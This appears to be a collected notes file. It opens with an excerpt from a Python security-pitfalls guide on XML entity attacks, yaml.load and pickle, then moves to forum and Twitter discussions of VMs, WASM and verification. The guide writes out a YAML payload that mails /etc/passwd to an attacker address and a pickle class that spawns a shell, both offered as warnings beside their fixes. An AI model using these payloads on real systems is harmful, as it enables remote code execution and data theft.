Another attack uses external entity expansion. XML supports referencing entities from external URLs, the XML parser would typically fetch and load that resource without any qualms. “An attacker can circumvent firewalls and gain access to restricted resources as all the requests are made from an internal and trustworthy IP address, not from the outside.”

Another situation to consider is 3rd-party packages you’re depending on that decode XML, such as configuration files or remote APIs. You might not even be aware that one of your dependencies leaves itself open to these types of attacks.

So what happens in Python? Well, the standard library modules (etree, DOM, xmlrpc) are all wide open to these types of attacks. It’s well documented: https://docs.python.org/3/library/xml.html#xml-vulnerabilities

Fix:

Use defusedxml as a drop-in replacement for the standard library modules. It adds safeguards against these types of attacks.
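defusedxml keeps the familiar etree interface, so switching is usually a one-line import change. If pulling in a dependency is truly impossible, a rough stdlib-only guard (a sketch of my own, not a replacement for defusedxml) is to reject any document that declares a DTD at all, since that is where entity bombs live; `parse_untrusted` is a made-up helper name:

```python
import xml.parsers.expat

def parse_untrusted(data: str) -> None:
    """Parse XML, refusing any document that carries a DTD."""
    parser = xml.parsers.expat.ParserCreate()

    # expat calls this as soon as it sees a <!DOCTYPE ...> declaration,
    # before any entity is defined or expanded.
    def forbid_dtd(doctype_name, system_id, public_id, has_internal_subset):
        raise ValueError("refusing XML with a DTD (possible entity bomb)")

    parser.StartDoctypeDeclHandler = forbid_dtd
    parser.Parse(data, True)

parse_untrusted("<config><debug>off</debug></config>")  # parses fine
```

Fed the billion-laughs payload above, this trips `forbid_dtd` before a single `&lol;` is ever expanded.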

...

7. Using yaml.load

To quote the PyYAML documentation:

    “Warning: It is not safe to call yaml.load with any data received from an untrusted source! yaml.load is as powerful as pickle.load and so may call any Python function.”

This beautiful example was found in the popular Python project Ansible. You could provide Ansible Vault with this value as (valid) YAML, and it calls os.system() with the arguments provided in the file.

!!python/object/apply:os.system ["cat /etc/passwd | mail me@hack.c"]

So, effectively, loading YAML files from user-provided values leaves you wide open to attack. (Demo of this in action: credit Anthony Sottile.)

Fix:

Use yaml.safe_load pretty much always, unless you have a really good reason not to.
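A minimal contrast, assuming PyYAML is installed:

```python
import yaml  # PyYAML

doc = """
retries: 3
hosts:
  - web1
  - web2
"""

# safe_load builds only plain Python types (dict, list, str, int, ...).
config = yaml.safe_load(doc)

# The same loader rejects !!python/object tags outright, so the
# os.system payload above raises an error instead of executing.
```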

...

8. Pickles

Deserializing pickle data is just as bad as YAML. Python classes can declare a magic method called __reduce__ which returns a string, or a tuple with a callable and the arguments to call, when pickling. An attacker can use that to reference the subprocess module and run arbitrary commands on the host.

This wonderful example shows how to pickle a class that opens a shell in Python 2. There are plenty more examples of how to exploit pickle.

import cPickle
import subprocess
import base64

class RunBinSh(object):
    def __reduce__(self):
        return (subprocess.Popen, (('/bin/sh',),))

print base64.b64encode(cPickle.dumps(RunBinSh()))

Fix:

Never unpickle data from an untrusted or unauthenticated source. Use another serialization pattern instead, like JSON.
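The JSON alternative in miniature: unlike pickle, the deserializer can only ever build plain data, never invoke a callable.

```python
import json

record = {"user": "alice", "roles": ["admin"], "active": True}

# json.loads can only produce dicts, lists, strings, numbers, booleans,
# and None, so attacker-supplied input cannot smuggle a callable the
# way __reduce__ does with pickle.
roundtripped = json.loads(json.dumps(record))
```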

...

Have you tried Bandit?

There’s a great static linter that will catch all of these issues in your code, and more!

It’s called bandit; just pip install bandit and run bandit ./codedir.

" -- [16]

---

nickpsecurity on Apr 3, 2018

parent favorite on: A Visual History of Eve: 2014 - 2018

Definitely more interoperability, to get the best tool for the job and leverage ecosystems. I'm with you on that. On this...

"they should focus on interoperating with other languages (as in the Unix philosophy)."

Maybe instead follow the OpenVMS philosophy where they standardized the calling conventions to support multi-language development.

http://h41379.www4.hpe.com/doc/82final/5973/5973pro.html#int...

Microsoft's CLR followed that path in the VM space and got similarly good results. Tools like Racket and mbase do this with DSLs, where they share an underlying LISP-like language to avoid problems with the DSLs' own weaknesses.

pjmlp on Apr 3, 2018 [-]

Actually, on Windows we have come full circle, as those CLR ideas, which were originally conceived for the COM Runtime, have been brought back into COM as UWP.

IBM mainframes also follow the multi-language environment philosophy.

chubot on Apr 3, 2018 [-]

Yup I mentioned Microsoft COM (which Mozilla's defunct XPCOM was modelled after). Shared libraries and binary interfaces, rather than C header files.

Come to think of it I'd like to see a postmortem on XPCOM.

Chrome apparently uses more of a build-time tool to generate interfaces in both C++ and JavaScript.

---

" Does building a VM without a language make sense? I don't know of any successful instances of this approach.

There are lot of hairy corner cases in languages, and VMs reflect that. If you build the VM first, those design decisions may not be obvious, or might come to light a lot later.

I tried compiling Python code to the Lua VM and found that it is extremely coupled to Lua's semantics. That's even more the case with Python's VM. (for example scope rules, module systems, etc.) " -- [17]

---

here's how the LLVM backend deals with WASM's structured programming requirements. Note that the comment at the top says that this transformation assumes that all loops are single entry:

[18]

---

wasm limits:

https://webassembly.github.io/spec/core/appendix/implementation.html#syntactic-limits

---

"

Tim Sweeney @TimSweeneyEpic

Here's another thing I believe: The next mainstream programming language (or family of them) will have functional-logic underpinnings like backtracking, unification, and failure. The move will be driven by the improvements in writing code that's concise, correct, and verifiable. 2:58 PM - 1 Apr 2019

Tim Sweeney @TimSweeneyEpic Apr 1

Curry is the most-developed FLP language so far. However, it's still sort of a half-way step, which doesn't fully embrace first-class failure (and still exposes boolean ops), and doesn't use backtracking for loop iteration. https://www-ps.informatik.uni-kiel.de/currywiki/

Tim Sweeney @TimSweeneyEpic Apr 1

McAllester's Ontic (https://mitpress.mit.edu/books/ontic ) makes the leap in recognizing logic programming constructs for expressing the values inhabiting types. However, the elegance is easy to mistake with LISP macro hackery given the s-expression syntax.

Ron Pressler @pressron Apr 1, replying to @TimSweeneyEpic

In the early '00s it was proven that linguistic abstractions and various forms of decomposition cannot make verification easy (and BTW, in practice, the languages that have so far had the best success in terms of both formal and informal verification are synchronous languages)

Tim Sweeney @TimSweeneyEpic Apr 1

Yes, the general case of verification is theorem-proving. The ultimate language would ultimately support that, but ought to also make it much easier than at present to adopt small-scale verification.

Tim Sweeney @TimSweeneyEpic Apr 1

For example, today accessing vertices through an integer index buffer introduces a potential array-out-of-bounds at every step. If we could make those accesses into potential failures, the compiler could point that out for us.

Tim Sweeney @TimSweeneyEpic Apr 1

Then if we could express that index buffer as an array of natural numbers less than the number of vertices, then the compiler could recognize that and generate safe and faster code. This is the spirit of verification "in the small".

Ron Pressler @pressron Apr 1

It's easy to characterize what you call "verification in the small" as properties that can be readily expressed as what's called inductive properties (also, compositional properties). It is also easy to show that most interesting program properties do not have this quality.

Ron Pressler @pressron Apr 1

It's certainly likely that tooling that allows more inductive properties to be easily verified would help us write better programs, but it is unclear by how much. It is also likely that any (probably small) progress will be quickly dwarfed by growing requirements.

Ron Pressler @pressron Apr 1

(P.S. an inductive/compositional property is one that is preserved by any operation in the language; equivalently, if A and B are any terms for which the property holds, then it also holds for A ; B, where ; is some composition)

Georg @PLT_cheater Apr 1

Ron, what Tim is talking about is realized by e.g. Liquid Haskell, and the problem he'd solve with it is very practical and tangible. I would not say it's not a useful property.

Ron Pressler @pressron Apr 2

It's not that no easy property is useful, it's that most useful properties aren't easy. The easy properties can only take you so far, and while that may have some positive impact on correctness, it's not a drastic one.